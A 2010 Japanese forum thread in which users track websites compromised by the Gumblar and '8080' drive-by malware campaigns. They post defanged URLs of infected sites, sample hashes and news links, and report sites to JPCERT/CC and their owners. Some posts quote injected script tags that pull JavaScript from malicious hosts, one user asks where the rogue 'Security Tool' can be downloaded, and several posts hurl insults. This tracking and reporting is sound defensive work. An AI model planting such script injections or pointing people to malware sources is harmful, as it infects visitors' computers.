悪用されたところで、ちゃんとアップデートしていれば問題ないんだし、
これだけ騒がれて未だにアップデートもしないずさんな奴は
自重しても別のウィルスに感染するだろ。
283名無しさん@お腹いっぱい。:2010/09/21(火) 13:18:10
だな。
というか1匹のアホのせいで情報の提供・共有に臆するようになったら本末転倒じゃね。
284名無しさん@お腹いっぱい。:2010/09/21(火) 16:09:58
>>280
8080が一時撤退していたからな
現在、放置サイトを中心に新ドメインで再起動中

44Gr44GC44GG44G144GP44Gp44Gj44Go44GT44KA
ここみればわかるんじゃね?
285名無しさん@お腹いっぱい。:2010/09/21(火) 20:48:35
>>284
不定期で観測してるけど
また、動きあったん?

てか、今見たら飛び先の飛び先がまた変わってた。。。おrz。。。。
よく見たら別のXの蜜壷化してるとこの飛び先になってた。
つーことは8080じゃなくてXだったんか>>284
286名無しさん@お腹いっぱい。:2010/09/21(火) 20:58:36
>>285訂正
ホスト勘違いすた。
>>285は忘れてちょ。m(_ _)m
287名無しさん@お腹いっぱい。:2010/09/21(火) 22:07:24
>>286
下段のphp
・jsunpack
09d45fc74d80a65f539b612e6a90739abfe61186
288名無しさん@お腹いっぱい。:2010/09/21(火) 23:16:59
>>287

あらら、中身かわっちゃたのねぇ。。。
自分が投げた時の
fc588961ef3119b8dc764166e8454389983601ff

昨日検体送った分で、>>287の飛び先もあったからどーすべ。
289名無しさん@お腹いっぱい。:2010/09/21(火) 23:48:52
>>287
とりあえず送ったお。
jsunpack使わせていただきました。m(_ _)m
(何度もアクセスさせるとjsunpackも拒否られるようなので。)
290名無しさん@お腹いっぱい。:2010/09/21(火) 23:55:36
久しぶりにきたら、アホが復活してるのね・・・
フラッシュプレイヤー、更新したほうが良い?
291名無しさん@お腹いっぱい。:2010/09/22(水) 00:04:05
んなアホな質問するような人は来なくていいです
292名無しさん@お腹いっぱい。:2010/09/22(水) 01:00:36
>>290
そのまま阿呆に死ね
293名無しさん@お腹いっぱい。:2010/09/22(水) 01:22:29
ここの住人は陥落サイトを発見できるスキルのある人が選民意識を持ってやってる
初心者はうせろ
294:2010/09/22(水) 02:36:22
自己紹介は他所でやれ
あるいは死ね
295名無しさん@お腹いっぱい。:2010/09/22(水) 12:07:47
またアンタか…つくづく暇な奴だな
296:2010/09/22(水) 13:02:27
またアンタか…つくづく暇な奴だな
297名無しさん@お腹いっぱい。:2010/09/22(水) 16:12:54
取扱注意
www●okestyles●com/mainframe●asp?c=1 (〜529あたりまで延々と...)
※改竄を放置したまま下記サイトに逃亡
www●okestyleszakka●com

アクセス注意
en-trance●co●jp
>>130参照
完璧にオワタwwwwwww
298名無しさん@お腹いっぱい。:2010/09/22(水) 19:38:06
>>297
おちゅ。
JPCERT/CCにもめるぽすた。
299名無しさん@お腹いっぱい。:2010/09/23(木) 23:44:50
en-trance●co●jp
またコードが変わったなw
300名無しさん@お腹いっぱい。:2010/09/24(金) 04:33:31
>>299
今度は伊太利亜語れすか。。。

aHR0cDovL3RyYW5zbGF0ZS5nb29nbGUuY29tL3RyYW5zbGF0ZV90P3RleHQ9YXVtZW50YXJlJTIw
Y29tZSUyMGwlMjBlcmV6aW9uZSUyMHRoZSUyMG9mJTIwZmFybWFjbyUyMHpvbG9mdCUyMHR3byUy
MHJlbWFpbnMlMjBjaGVhcCUyMGdlbmVyaWNzJTIwc2l0ZXMlMjBzaXRlcyUyMHRvJTIwYW5kJTIw
aW1wb3RlbnphJTIwc2ludG9taSUyMHByZXNjcmlwdGlvbiUyMHBvc29sb2dpYSUyMHBsYW5uaW5n
JTIweGFuYXglMjBhbGxlcmdpYSUyMHBwZCUyMHRoZSUyMGElMjBhY2NvdW50JTIwb2YlMjBhZGRz
JTJDJTIwdGhlJTIwYmUlMjBjbGElMjBtZWdhJTIwZXhhbWluaW5nJTIwYW5kJTIwc2VyaW91cyUy
MGFyZSUyMHNjaWVudGlzdHMlMjBpdCUyMGZyaWVuZHMlMkUlMjBtZXJjZWRlcyUyMGNsYSUyMDI5
JTIwc2FmZXR5JTIwcHJhY3RpdGlvbmVycyUyMGludGVyYWN0aW9ucyUyMG1vZHVyZXRpYyUyMHBl
ciUyMGRpbWFncmlyZSUyMHNpdGVzJTIwZGklMjBwZXIlMjBzbWV0dGVyZSUyMGZ1bWFyZSUyMGxp
YnJvJTIwb2ZmZXJlZCUyMGElMjBpbCUyMHVuaXZlcnNpdHklMjBhbiUyMGxldHRlcnMlMjB0byUy
MGlzJTIwc3BvcnQlMjBncmF2aWRhbnphJTIwYXZlcmFnZSUyMGElMjBQcm90ZWN0aW9uJTJFJTIw
YXJ0cml0ZSUyMGFjdXRhJTIwSW4lMjBubyUyMHdpdGglMjBhbmQlMjBuZWVkJTIwcGlhbmNhdmFs
bG8lMjBkaW1hZ3JpbWVudG8lMjBzdGF0ZSUyMGNlbnRybyUyMGtpbmQlMjBtaWNhcmRpcyUyMGJv
ZWhyaW5nZXIlMjBhbmQlMjB3aG9sZSUyMGFsaSUyMGxlJTIwYXByaSUyMGNvbXBhbnklMjB0aGF0
JTIwc291cmNlcyUyMGlzJTIwdGhlJTIwdGhlJTIwZGlhYmV0ZSUyMGludGVybmV0JTIwdG8lMjBw
cmV2ZW56aW9uZSUyMEluYyUyRSUyQyUyMGluY2x1ZGluZyUyMHA1MyUyMGUlMjBjYW5jcm8lMjBw
cm92aWRlJTIwc29jaWFsJTIwZW50cmVwcmVuZXVyJTIwYXdhcmQlMjBwcmVzY3JpcHRpb24lMjBk
YW5nZXIlMjBpbnZvbHZlZCUyMHBhcnQlMjBkaWFiZXRlJTIwYXR0aXZpdGElMjBmaXNpY2ElMjBh
Ym91dCUyMGlzJTIwc3RheSUyMHNlZ25vJTIwc2NvcnBpb25lJTIwZW5zdXJlJTIwc3VjaCUyMGFs
bGVyZ2lhJTIwYWdsaW8lMjBwb3dlcnMlMjBmZXclMjBvZiUyMGFuZCUyMHBhc3QlMjBjYXB0b3By
aWwlMjBlbmFsYXByaWwlMjBleWUlMjBzYXlzJTIwdGVybWlub2xvZ3klMjBGVENzJTIwYSUyMElu
JTIwZm9iaWElMjBzb2NpYWxlJTIwdGhlJTIwbmFtZSUyMGNvbmNlcm5zJTJDJmxhbmdwYWlyPWl0
fGphJmhsPWphJmllPVVURjgj
301名無しさん@お腹いっぱい。:2010/09/24(金) 04:41:41
>>300σ(゚∀゚ ∬オレだけど、ぐぐる翻訳のバグかな?
英語だとgdgdになっちゃう。
302名無しさん@お腹いっぱい。:2010/09/24(金) 07:48:59
>>299
これもガンブラーなんだ
303名無しさん@お腹いっぱい。:2010/09/25(土) 07:08:29
304名無しさん@お腹いっぱい。:2010/09/25(土) 10:04:10
リンク貼る前に口頭で説明しろ
305名無しさん@お腹いっぱい。:2010/09/25(土) 13:34:19
「security tool」に感染した方へ
よくわかってない人が書いてるsecurity toolの削除方法では
8080の本体(高機能ダウンローダー)のほうを潰してないので、
セキュリティ的には何もしてないのと同じです(まともに動くようにしただけ)

8080の本体を潰さない不完全な削除はらネットに繋いでるだけで他人に迷惑をかけている(可能性が非常に高い)ので、
必要なデータをバックアップした後にリカバリ(クリーンインストール)を行って下さい。
※複数のセキュリティソフトで膨大な時間を費やして不完全な削除(HDDをゴリゴリ鳴かせて寿命を縮める)より、
リカバリ一発のほうが遥かに早くて確実です。
306名無しさん@お腹いっぱい。:2010/09/25(土) 14:13:06
security tool削除で以前話題になったサイト、
1000円払えば教えてくれるらしいよ
ttp://8.pro.tok2.com/~miyuki-net-school/
307名無しさん@お腹いっぱい。:2010/09/25(土) 14:53:29
security toolってどういう状況で感染するんだ
308名無しさん@お腹いっぱい。:2010/09/25(土) 15:08:03
無防備都市
309名無しさん@お腹いっぱい。:2010/09/25(土) 15:15:48
>>2,3の対策してなければやばい
Webシールド機能無しのセキュリティソフトも微妙
310307:2010/09/25(土) 15:27:12
感染動画とかあれば見てみたいな
311名無しさん@お腹いっぱい。:2010/09/25(土) 15:55:48
>>310
YouTube - 「衝撃!!ウイルス感染のその瞬間 前編」
http://www.youtube.com/watch?v=ijb-fNMA8Aw&feature=related
312307:2010/09/25(土) 16:02:01
偽セキュリティーソフトがインスコされるのか
313名無しさん@お腹いっぱい。:2010/09/25(土) 16:30:44
>>307
発言がいちいち恥ずかしいから黙ってみてろ
314名無しさん@お腹いっぱい。:2010/09/25(土) 19:18:31
>>306
あのくそじじい・・・まだ懲りてないのかwww
315名無しさん@お腹いっぱい。:2010/09/25(土) 23:01:24
不正プログラム:毎日jpなど被害 広告配信データ改ざん
ttp://mainichi.jp/select/biz/it/news/20100925k0000e040051000c.html
316名無しさん@お腹いっぱい。:2010/09/26(日) 00:21:30
今回の改ざんでWMPが起動したって書き込みをちらほらと見かけるんだが、WMPになんか脆弱性あったっけ?
317名無しさん@お腹いっぱい。:2010/09/26(日) 02:22:23
>>316
ヒント:自動再生
318名無しさん@お腹いっぱい。:2010/09/26(日) 02:47:42
今回のパンデミックで日本にはセキュリティソフトに依存してるバカが異常に多いという事がよくわかった
319名無しさん@お腹いっぱい。:2010/09/26(日) 03:17:03
>>317
自動再生ってリムーバブルディスク挿した時とかのアレ?
320名無しさん@お腹いっぱい。:2010/09/26(日) 05:10:15
jsunpackの調子がおかしいっぽいのは漏れだけ?
321名無しさん@お腹いっぱい。:2010/09/26(日) 17:30:12
なんかもう完全に日本だけが狙い撃ちにされてんな
322名無しさん@お腹いっぱい。:2010/09/26(日) 23:34:09
ソフトウェアのアップデート切ったり、サポート切れたOSを使い続けたりしてるんだから狙い撃ちにされて当然
323名無しさん@お腹いっぱい。:2010/09/27(月) 03:02:38
時期的に考えてチャイニーズ・ニート(スーパーハカー)の仕業だろ
船長の件で「あんな事(保障しろとか、無茶苦茶な要求まで)」言われてるんだから
日本もスーパーハカーにやられたサイトの復旧費用を請求すべき
200兆円くらい()笑
324名無しさん@お腹いっぱい。:2010/09/27(月) 07:57:36
【GENOウイルス】GIGAZINEの広告がウイルス感染、他のサイトでも同様の被害か
http://kamome.2ch.net/test/read.cgi/news/1285541363/
325名無しさん@お腹いっぱい。:2010/09/27(月) 09:24:13
クソサイト
ttp://gumblar8080taisaku.com/
またECスタジオのEset宣伝サイト
326名無しさん@お腹いっぱい。:2010/09/27(月) 17:00:05
メルアド収集サイト
327名無しさん@お腹いっぱい。:2010/09/27(月) 17:20:35
>ガンブラーのような未知のウィルスに対し
>圧倒的に強いセキュリティソフトはESET Smart Securityです

ワロタwwww
328名無しさん@お腹いっぱい。:2010/09/27(月) 22:45:12
まだやってやがんのかよGumblar作者はよ!
ほんと殺してやりてぇ
329名無しさん@お腹いっぱい。:2010/09/27(月) 23:19:58
>ガンブラー制作者
いい加減に捕まえてほしいねぇ・・・

ただ、実際に捕まるのは。三流制作者の原田ウイルスやKenzeroぐらいだよなぁ・・・
あれはアホすぎ。
330名無しさん@お腹いっぱい。:2010/09/27(月) 23:23:20
つーか、ただの実行ファイルを配って、ユーザーに実行させている時点で
そもそもあれはウイルスじゃないよな。
331名無しさん@お腹いっぱい。:2010/09/28(火) 02:01:35
新種のガンブラーは去年の12月23日くらい騒ぎになったんだっけ?
で、アドビは休みに入るから対応遅れるけど よろしくねー的な対応だった気が・・・
332名無しさん@お腹いっぱい。:2010/09/28(火) 05:06:07
>>331
あれは酷かった・・・
さんざん機能拡張した挙句
脆弱性だらけのものを作っておきながら
感染拡大状態から対応に約一ヶ月かかった。
http://www.so-net.ne.jp/security/news/library/2118.html
333名無しさん@お腹いっぱい。:2010/09/28(火) 06:50:08
今もAdobeReader放置のままだしね
来月4日「の週」の予定
334名無しさん@お腹いっぱい。:2010/09/28(火) 10:40:45
readerなんて使わねーだろ
335名無しさん@お腹いっぱい。:2010/09/28(火) 13:02:04
pdfはサンドボックスで開くようにすればいい。
336名無しさん@お腹いっぱい。:2010/09/28(火) 13:25:21
【ゼロデイ多発】Adobe≒Badbe【叩きサラダ】
337名無しさん@お腹いっぱい。:2010/09/28(火) 14:17:18
取扱注意
tukaoh●com/index●html
338名無しさん@お腹いっぱい。:2010/09/28(火) 22:21:55
ドライブ・バイ・ダウンロード攻撃によるAdobe Readerゼロデイ脆弱性の悪用
ttps://www-950.ibm.com/blogs/tokyo-soc/entry/adobe_0day_20100928?lang=ja
339名無しさん@お腹いっぱい。:2010/09/29(水) 03:13:45
みんな、なんであれだけ脆弱性でやられまくっても、
XPやFirefox使い続けるんだろ?

Vista以降・IEで保護モードオンorChrome・一般ユーザーでログイン
の3つを組み合わせたら相当安全性高まるのにね
340名無しさん@お腹いっぱい。:2010/09/29(水) 03:16:00
このまえアップデートされたFlash最新版では、特定サイトで数十秒間フリーズするっていう問題があって、
たまにそれにあうな

サードパーティーのFlashクッキーを受け入れない設定にしてニコニコ動画見た場合とかそれにあう
その他にも条件不明だけどたまに数十秒間フリーズするサイトがある
341名無しさん@お腹いっぱい。:2010/09/29(水) 03:25:32
>>340
動画サイトを見ていてそうなったことがあったかも。
その現象について書かれたサイトってあったりする?

以前のverのFlashだと脆弱性があるって聞くし、
アップデートしといた方が良いんだろうけど、
ブラウザごとのフリーズくらいなら我慢するしかないのか・・・
342名無しさん@お腹いっぱい。:2010/09/29(水) 10:01:49
サードパーティーのクッキーとかはサイトごとに保存するかどうか設定できなかったっけ
343名無しさん@お腹いっぱい。:2010/09/29(水) 17:41:31
APSB10-22がfixされたラボのFlashPlayer10.2preview2はどうよ?
人柱版なんで別の未知の穴あいてるかもしれないけど
344名無しさん@お腹いっぱい。:2010/09/29(水) 19:03:45
>>339
基本的な対策を怠ってる愚か者は何を使っても喰らうから、OSとかブラウザはあまり関係無い。

そして真の愚か者は、HIPSが止めたものを確認もしないで「はい(実行)」を押して感染するw
345名無しさん@お腹いっぱい。:2010/09/29(水) 19:40:58
security toolをダウンロードしたいんだが、まだDl可能なURLある?
346sage:2010/09/30(木) 01:40:23
マイクロソフト セキュリティ情報 MS10-070 - 重要
ASP.NET の脆弱性により、情報漏えいが起こる (2418042)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms10-070.mspx
NET Frameworkオワタ
347名無しさん@お腹いっぱい。:2010/09/30(木) 03:28:08
パッチ済みなのに何を言ってるんだ
348名無しさん@お腹いっぱい。:2010/10/01(金) 23:48:50
>>345
なんに使うん?
広告サーバー改竄でSecurityToolがアップロード
されてた所はまだ稼動しておるが
349名無しさん@お腹いっぱい。:2010/10/02(土) 08:07:29
なんに使うって…そりゃ悪い事だよなァ?
350名無しさん@お腹いっぱい。:2010/10/04(月) 02:00:31
http://www.microad.jp/press/20100925/
>弊社にて確認したところ9月24日23:30頃には悪意あるサイトへの転送は停止しておりました。

25日1時ごろまでドライブバイ・ダウンロード状態だったはず
GIGAZINEでの確認も9月24日(金)23時59分22秒だし↓
http://gigazine.net/index.php?/news/comments/20100927_security_tool/

詳細を告知すりゃ名誉挽回できるのに残念
351名無しさん@お腹いっぱい。:2010/10/04(月) 02:02:58
残念とか関係者か?
どうでも良いだろ
352名無しさん@お腹いっぱい。:2010/10/04(月) 02:10:44
よく理解できないがそのサイト張りまくってるのはその件に関係してるのかな
353名無しさん@お腹いっぱい。:2010/10/04(月) 02:34:27
詳細が告知されれば、同様被害を減らせるでしょ
改竄されたのは残念だけど、失敗の経験を共有したい

繕うとすると可笑しなことに↓なるし
ttp://mimizun.com/log/2ch/sec/1274675964/118-
354名無しさん@お腹いっぱい。:2010/10/04(月) 02:44:41
残念でも何でもないが
意味が分からないな
355/名無しさん[1-30] ◆.htmlint.U :2010/10/04(月) 07:06:03
漏れが件の広告枠をダンさんとこで最終確認したのは 2010/09/24 23:16 頃だたぁーよ。
>>303の頃にはメルしてた。

広告枠のタグのアドレス→転送サイト自体が蹴りまくっていたようなので環境によっては>>350になるかも。(転送先アドレスも含めてダンさん蹴られてた。)
aguseで転送サイトから転送先アドレスの最終確認は 2010/09/25 01:38 頃。
356名無しさん@お腹いっぱい。:2010/10/05(火) 18:42:56
取扱注意

www●cyg●jp/
>サイバーギグスのWEBサイト制作は(中略)1ページ1万円という低価…

www●movie-aa●com/
<title>サイバーギグス|PV制作|専門用語集|-あ行-|
<script src=http://pop●dj/en/sitemap●php ></script>映画とは?</title>

他人の心配をする前に、自社のサイトが改竄されてるのを何とかしてくださいw

【Google先生の診断結果】
www.google.com/safebrowsing/diagnostic?site=www●movie-aa●com/&hl=ja
>疑わしいサイトとして認識されています。>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
>Google が最後にこのサイトを巡回したのは2010-09-30で、このサイトで不審なコンテンツが最後に検出されたのは2010-09-30です。

ぐっじょぶwwwww
357/名無しさん[1-30] ◆.htmlint.U :2010/10/05(火) 20:02:24
>>356
otu

JSUNPACK
f6e5de3faf0333e2e04d04c1ad02c0562cee14c7
6bbf617a256b2c06b91fcf74daad67035fa0a410

VIRUSTOTAL.
b6cf294f8fc9ecfe0a57ec6ee74f751ec3479aeba7b85265839bec7c36a4f6ba
daeea74be1aced7dfee6065d8eaa0b7b168faf1368e5bac8d327cc522153bab7

タグはDanさんとこ蹴っている。。。
358/名無しさん[1-30] ◆.htmlint.U :2010/10/05(火) 20:51:21
めるぽかんりょ
359/名無しさん[1-30] ◆.htmlint.U :2010/10/05(火) 23:55:36
>>357
つづき

Avira対応予定
HTML/ScrInject.G
JS/Dldr.Agent.abb


あきたねる
360名無しさん@お腹いっぱい。:2010/10/06(水) 18:29:30
こういった底辺web制作会社のPCがトロイにやられて、担当する顧客のwebサイトの
FTPパス抜かれまくって改竄されるんだろうな
361名無しさん@お腹いっぱい。:2010/10/06(水) 20:37:11
こんなもん感染するわけないじゃん。
362名無しさん@お腹いっぱい。:2010/10/07(木) 23:33:42
>>357-359 乙乙

取扱注意
・google-statsXX系
www●snowfan-mimo●com/area/area-service●asp?sID=467
sID=XXXが全滅の予感

【Google先生の(ry
www.google.com/safebrowsing/diagnostic?site=www●snowfan-mimo●com/&hl=ja
>146 ページのうち 74 ページで、ユーザーの同意なしに不正なソフ…
363/名無しさん[1-30] ◆.htmlint.U :2010/10/08(金) 00:15:32
>>362
こちらの環境では500返ってきます。
ヤホのキャッシュで確認しましたが誘導先のstats50はないようです。。。

スクリプトを抜き出してVTに投げてみました。
833e2f264ae0ec69445fdc6d070312b564654cd72480b8c1465478401af77658


とか、やってるうちに>>362繋がった。
55ってのもあるんか。。。
ワイルドカードなんかな?
364/名無しさん[1-30] ◆.htmlint.U :2010/10/08(金) 01:07:32
>>362
あらためて乙ですた。
めるぽかんりょっす。
365名無しさん@お腹いっぱい。:2010/10/08(金) 16:19:43
googleの検索結果にこう出てるんですけど、やっぱり感染してるのかな?

ツール・ド・安倍峠 - MCプロダクトのページ
このサイトはコンピュータに損害を与える可能性があります。
2010年8月20日 ... ツール・ド・安倍峠 大会事務局 佐藤 治史(サトウ ハルフミ) ※入金の確認が取れた方には、事務局より参加受理書をお送りいたします。 ※ネット銀行よりお振込される方は、 振込先を全て入力して下さい。 ...
www●mc-pro●co●jp/abetouge/abetouge.html
366/名無しさん[1-30] ◆.htmlint.U :2010/10/08(金) 19:04:16
>>365
こんなことがあったようです。(>>353を参考にみてくださいな)
http://yuzuru.2ch.net/test/read.cgi/bicycle/1274359715/820-871 (820、830、836、871)
深くは見ていないので他の方のご意見・報告もお待ちくださいな。


>>362
404になったっぽい。

Avira対応予定
HTML/SrcInject.C
HTML/SrcInject.L
HTML/SrcInject.M
HTML/SrcInject.N
HTML/SrcInject.O
367名無しさん@お腹いっぱい。:2010/10/08(金) 19:36:10
>>365
静岡市・身延町交流イベント実行委員会  静岡市側 に凸。
市役所に繋がりました。市役所から業者に問い合わせるそうです。

>>366
●がないからみれにゃい。。
368/名無しさん[1-30] ◆.htmlint.U :2010/10/08(金) 19:58:56
>>367
乙です乙です。


> ●
>>366http://yuzuru.2ch.net/test/read.cgi/bicycle/1274359715/820-871>>353のようにすると過去ログがある場合もあります。
mimizun.com/log/2ch/bicycle/1274359715/820-871
(直リンするとみみずんさんの負担が大きいので>>366にしました。)

みみずんさんとこに無い場合もありますん。
2ch DAT落ちスレ ミラー変換機
ttp://mirrorhenkan.g.ribbon.to/
それでも無いことも。。。
●があればパーペキなんですけど。。。orz.....
369名無しさん@お腹いっぱい。:2010/10/08(金) 20:14:52
370名無しさん@お腹いっぱい。:2010/10/08(金) 20:15:54
>>365
そのページとトップページを見たけど不正コードを確認できない

Googleも最後の検知日が9/20でもう時間が経っちゃてる
 ハッキングされてたのは間違いなんだろうけど
Google警告は管理者が対処完了報告しないと一定期間は消えない
371名無しさん@お腹いっぱい。:2010/10/09(土) 17:09:46
エロ漫画検索してて遭遇したページなんだけど、
開くとメディアプレイヤーアドオンを要求。
で、そのコードが</html>の後にあるのがちょっと怪しい。

blogs●yahoo●co●jp/tmoebooks/2463230●html

どうなんだろ、ここ
372名無しさん@お腹いっぱい。:2010/10/09(土) 17:29:45
判定スレじゃないよここは
373名無しさん@お腹いっぱい。:2010/10/09(土) 17:52:15
こういう上から目線のカスは死ねばいいと思うわ
報告してくれてるだけマシだろ
少なくともおまえのレスよりぜんぜんマシ
374名無しさん@お腹いっぱい。:2010/10/09(土) 17:59:44
上から目線すぎる…
375名無しさん@お腹いっぱい。:2010/10/09(土) 18:38:17
自己弁護乙
376名無しさん@お腹いっぱい。:2010/10/09(土) 18:40:07
報告して「くれてる」とかイミフ
377名無しさん@お腹いっぱい。:2010/10/09(土) 18:47:33
何かわかんないときは質問スレ行くといいよ
ここはどっちかっていうと明らかなやつについて情報交換するスレ
378名無しさん@お腹いっぱい。:2010/10/09(土) 20:13:31
上から目線の使い方が明らかに間違ってる
379名無しさん@お腹いっぱい。:2010/10/10(日) 00:31:53
>>371 >>373
Yahoo!ブログは初めてか? 力抜けよ、どこも同じだから
yimg.jpはYahoo!のファイル置き場な
380名無しさん@お腹いっぱい。:2010/10/10(日) 11:26:52
というかyimgはyahoo関係の画像とかだね
381名無しさん@お腹いっぱい。:2010/10/10(日) 21:34:44
取扱注意

未対応&再改竄のため再掲載
サイバーギグス
www●movie-aa●com/

・JSUNPACK
3c77eaea56260e02a480ebf8e2bff22b39636c3b

絶賛放置&崩壊中
iiji●biz/
文字化けして読めませんw
382/名無しさん[1-30] ◆.htmlint.U :2010/10/11(月) 00:35:26
>>381
おつですん。

上 二回目 無視かのぉ。。。
下 WHOISからメルってみました。
383名無しさん@お腹いっぱい。:2010/10/11(月) 11:13:40
教えてください

body-shaver●seesaa●net/
collagen-07●seesaa●net/
exercise-repo13●seesaa●net/

はaguse.jpでチェックすると
<script type="text/javascript" src="http://pantscow●ru:8080/Hardware●js"></script>
へのリンクがあると出てきますが、Sauceを見てもどこかがわかりません。

なんか、この間みたいにAdserverから出されているような気がするのですが、どなたかわかりませんか?

384名無しさん@お腹いっぱい。:2010/10/11(月) 11:49:31
わかりました。
sales-agency●jp/flv/swfobject●js
の末尾にありました
385名無しさん@お腹いっぱい。:2010/10/11(月) 17:07:55
>>384
ネットショップ代行会社が感染して
アフィ広告FLASH表示用のjsスクリプトに挿入されてるから
他のブログにも挿入されてる

Last-Modified: Sun, 18 Jul 2010 12:46:15 GMT
改竄されたのが6月と古く 今はpantscow●ruのIPがないので無害だと思うけど
当時はヘルプとサポートのゼロデイ攻撃もあったから効果があったかも
386名無しさん@お腹いっぱい。:2010/10/11(月) 22:32:11
【VB】ウィルスバスター2011【クラウド】
http://hibari.2ch.net/test/read.cgi/sec/1286803659/
387名無しさん@お腹いっぱい。:2010/10/12(火) 01:15:55
388名無しさん@お腹いっぱい。:2010/10/12(火) 09:55:02
caroll-amadea.bl0gger.eu/100531/p2/
389名無しさん@お腹いっぱい。:2010/10/12(火) 18:28:56
1〜6の頃の住人だったけど、もうペース落ちてきたね。

諸々の対策が効果を出してきたか、改ざんが分かりにくくなったか?
390名無しさん@お腹いっぱい。:2010/10/12(火) 22:34:50
パスワードの強制変更がよかった
[止まらぬサイト改ざん(1) ISPがガンブラー対策〜パスワードリセット敢行も]
http://www.so-net.ne.jp/security/news/library/2248.html
[ 止まらぬサイト改ざん(3):全ユーザー「FTPパスワード強制変更」の効果]
http://www.so-net.ne.jp/security/news/library/2278.html

sakuraは1月と比べて241→ 770と増えてるみたいだけどね
ttp://mimizun.com/log/2ch/sec/1263822552/855
391名無しさん@お腹いっぱい。:2010/10/12(火) 23:57:38
> ・aguse
> ttp://www.aguse.net/

糞仕様になったな
392名無しさん@お腹いっぱい。:2010/10/13(水) 04:04:49
Janeのコマンドで見れないなと思ったら
393名無しさん@お腹いっぱい。:2010/10/16(土) 07:21:22
最近めっきり話題無いなw
もういいのか?
394名無しさん@お腹いっぱい。:2010/10/16(土) 09:44:27
改竄攻撃は攻撃者の気分次第だから何とも・・・
MicroAdみたいのはいつでも起こりうるから「もういい」なんてなしす

gumblar → 活動継続中、相変わらず日IPは弾かれる
8080 → 先月から活動が鈍い感じ? 今週は小康状態
395名無しさん@お腹いっぱい。:2010/10/16(土) 23:07:46
今は日本のIPアドレスは弾くのか・・・
感染するような奴はいつもだいたい同じだから
新しい感染者を出すには別の国を短期集中的にやるのか?
396名無しさん@お腹いっぱい。:2010/10/20(水) 01:42:55
[ゲームのニュース/ショップでの状況等のブロク] ファミコンプラザゲーム最新情報ページ
p://www■famicom-plaza■com/blog/

10月18日 AM5:00頃〜AM11:00 にサイトに訪れた人にガンブラーの感染の疑い有りだそうです。
現在は上のページは復旧しているようです。
397名無しさん@お腹いっぱい。:2010/10/20(水) 03:38:37
http://nes3◎com/beutyeh/beh1/index◎htm
http://xyz111◎k2◎xrea◎com/comic/
http://click-no1◎jp/kp-unescape◎html
http://amyou◎net/pet/?feed=rss2
http://www◎marucen◎co◎jp/main◎html
http://www◎citydusk◎com/

失敗例含むかも
398名無しさん@お腹いっぱい。:2010/10/20(水) 11:18:01
古い型が多いな
399名無しさん@お腹いっぱい。:2010/10/20(水) 21:41:25
[エフセキュアブログ : そのApacheのモジュールは本物ですか?]
http://blog.f-secure.jp/archives/50455216.html
.soファイル↓とやらを利用する亜種があるそうな

[動的共有オブジェクト (DSO) サポート - Apache HTTP サーバ]
http://httpd.apache.org/docs/2.0/dso.html

400名無しさん@お腹いっぱい。:2010/10/21(木) 23:32:41
>397
click-no1 はY知恵袋の質問文を引っ張ってきたものなので改ざんされてない
(ワードサラダなごみサイトだが)
401名無しさん@お腹いっぱい。:2010/10/22(金) 00:00:38
Kasperskyのサイト改ざん ユーザーを偽サイトに転送
http://www.itmedia.co.jp/news/articles/1010/20/news060.html
402名無しさん@お腹いっぱい。:2010/10/22(金) 10:35:56
カスペった
403名無しさん@お腹いっぱい。:2010/10/23(土) 00:51:29
>>401
隠蔽とか、完璧にオワタwwww
404名無しさん@お腹いっぱい。:2010/10/23(土) 18:29:19
ウィルス対策ソフトの会社が改ざんされ
それを隠蔽するも改ざんされてた事がバレる
信頼度0%になってしまった
405名無しさん@お腹いっぱい。:2010/10/23(土) 19:10:32
ESETの仲間入りだなw
406名無しさん@お腹いっぱい。:2010/10/23(土) 23:04:45
オパーイ詐称CMなんか流してる場合じゃねぇw
407名無しさん@お腹いっぱい。:2010/10/23(土) 23:59:50
AKBという白アリ寄生虫なんかをCMに使うからだ
408名無しさん@お腹いっぱい。:2010/10/25(月) 16:33:24
国内100社以上で感染被害を確認。”mstmp” ”lib.dll” のファイル名で拡散する不正プログラム
ttp://blog.trendmicro.co.jp/archives/3723

ttp://www.rbbtoday.com/article/2010/10/25/71502.html
ttp://journal.mycom.co.jp/news/2010/10/25/041/
409名無しさん@お腹いっぱい。:2010/10/25(月) 17:14:31
>>408の情報って、あんま無いね。
410名無しさん@お腹いっぱい。:2010/10/25(月) 17:35:40
まぁ既にありふれた物になっちゃったgumblar/8080の亜種だしねぇ
411名無しさん@お腹いっぱい。:2010/10/25(月) 17:43:22
ユーザーに対しては、「OS、アプリケーションを最新の状態にする」
「最新バージョンのセキュリティソフトを導入し、最新の状態に保つ」という2点を
改めて徹底するよう呼びかけている。
ttp://internet.watch.impress.co.jp/docs/news/20101025_402502.html
Javaの脆弱性を悪用する不正プログラム「JAVA_AGENT.P」
412名無しさん@お腹いっぱい。:2010/10/25(月) 18:28:01
JREが1.6.0_22ならmstmpはダウンロードすらされないらしいと聞いた。
413名無しさん@お腹いっぱい。:2010/10/25(月) 19:30:28
>>408
これってマイクロアドのヤツか?
GIGAZINEでは'Security Tool'の他に
メディアプレーヤ、pdf、JARの脆弱性も利用されたみたいだし

「mstmp」系ウィルス補完計画
ttp://d.hatena.ne.jp/connect24h/comment?date=20101022
414名無しさん@お腹いっぱい。:2010/10/26(火) 02:03:36
ガンブラー流行ったのって去年の12月前後だったよね。
全然収束しなかったね。ガンブラーに関しては警察も動く的な記事を読んだ気もするけど・・
415名無しさん@お腹いっぱい。:2010/10/26(火) 09:24:46
インターネット絶滅に都合がいいから放置してるんじゃね
416名無しさん@お腹いっぱい。:2010/10/26(火) 09:51:42
GumblarとConfickerの戦い
ttp://www.youtube.com/watch?v=wpxcCKYvDsc

2010年上半期までは6:4とGumblar優勢だったはずが、
下半期に入りCon­fickerが逆転し、王者交代が行われた模様

だそうで(企業の話で一般家庭の話ではないみたい)
417名無しさん@お腹いっぱい。:2010/10/26(火) 12:53:16
418名無しさん@お腹いっぱい。:2010/10/26(火) 13:19:26
このまま進化すると最終的に生活インフラにまで悪影響を及ぼしかねない勢いだ
実は産業にダメージを与えるための兵器なのかもしれんな
419名無しさん@お腹いっぱい。:2010/10/26(火) 15:29:36
おれんところは、記憶力が落ちた祖母のところにあるPCの感染が不安だがな
ほんと、よくできたウィルスつくりやがって
420名無しさん@お腹いっぱい。:2010/10/26(火) 22:31:59
新しいウィルスは、上記の対策でいまのとこOK?
421名無しさん@お腹いっぱい。:2010/10/26(火) 23:03:56
どれのこといってんのかわからんけどだいたいおk
基本が大事なのです
